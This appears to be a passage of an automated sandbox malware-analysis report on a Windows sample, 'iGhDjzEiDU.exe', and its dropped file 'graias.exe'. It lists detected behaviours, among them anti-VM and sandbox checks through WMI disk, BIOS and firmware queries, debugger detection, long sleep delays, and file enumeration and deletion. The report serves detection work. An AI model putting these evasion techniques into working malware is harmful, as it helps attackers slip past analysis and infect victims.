                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: iGhDjzEiDU.exe PID: 6984, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: graias.exe PID: 6620, type: MEMORYSTR
                Delayed program exit found
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0040E54F Sleep,ExitProcess,5_2_0040E54F
                Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} WHERE ResultClass = Win32_DiskDrive
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk Where DriveType=3
                Query firmware table information (likely to detect VMs)
                Source: C:\Windows\SysWOW64\dxdiag.exeSystem information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeMemory allocated: 12C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeMemory allocated: 2F40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeMemory allocated: 9680000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeMemory allocated: A680000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeMemory allocated: A890000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeMemory allocated: B890000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory allocated: E50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory allocated: 2B70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory allocated: ED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory allocated: 8BD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory allocated: 9BD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory allocated: 9DD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory allocated: ADD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,38_2_0040DD85
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,5_2_004198D2
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5563Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 408Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6046Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1579Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeWindow / User API: threadDelayed 8756
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeEvaded block: after key decisiongraph_5-47121
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeEvaded block: after key decisiongraph_5-47097
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeEvaded block: after key decisiongraph_5-47101
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeAPI coverage: 5.8 %
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeAPI coverage: 9.5 %
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exe TID: 7040Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6408Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 4304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep count: 6046 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7468Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep count: 1579 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe TID: 7236Thread sleep time: -26268000s >= -30000s
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040B335
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,5_2_0041B43F
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040B53A
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,5_2_004089A9
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00406AC2 FindFirstFileW,FindNextFileW,5_2_00406AC2
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,5_2_00407A8C
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00418C79
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,5_2_00408DA7
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_100010F1
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0040AE51 FindFirstFileW,FindNextFileW,38_2_0040AE51
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 39_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,39_2_00407EF8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,41_2_00407898
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_00406F06
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00418981 memset,GetSystemInfo,38_2_00418981
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: svchost.exe, 0000002C.00000002.2207078230.0000000002A3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: graias.exe, 00000006.00000002.1731190562.0000000006BE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: svchost.exe, 00000016.00000002.1908700310.000000000323F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:s
                Source: graias.exe, 00000006.00000002.1731190562.0000000006BE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\C#
                Source: graias.exe, 00000008.00000002.2395821295.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, graias.exe, 00000008.00000002.2395821295.000000000125A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: svchost.exe, 00000038.00000002.2367956151.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: svchost.exe, 00000033.00000002.2284798507.000000000343F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: graias.exe, 00000006.00000002.1731190562.0000000006BE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0043A66D
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,38_2_0040DD85
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,5_2_0041BCF3
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00442564 mov eax, dword ptr fs:[00000030h]5_2_00442564
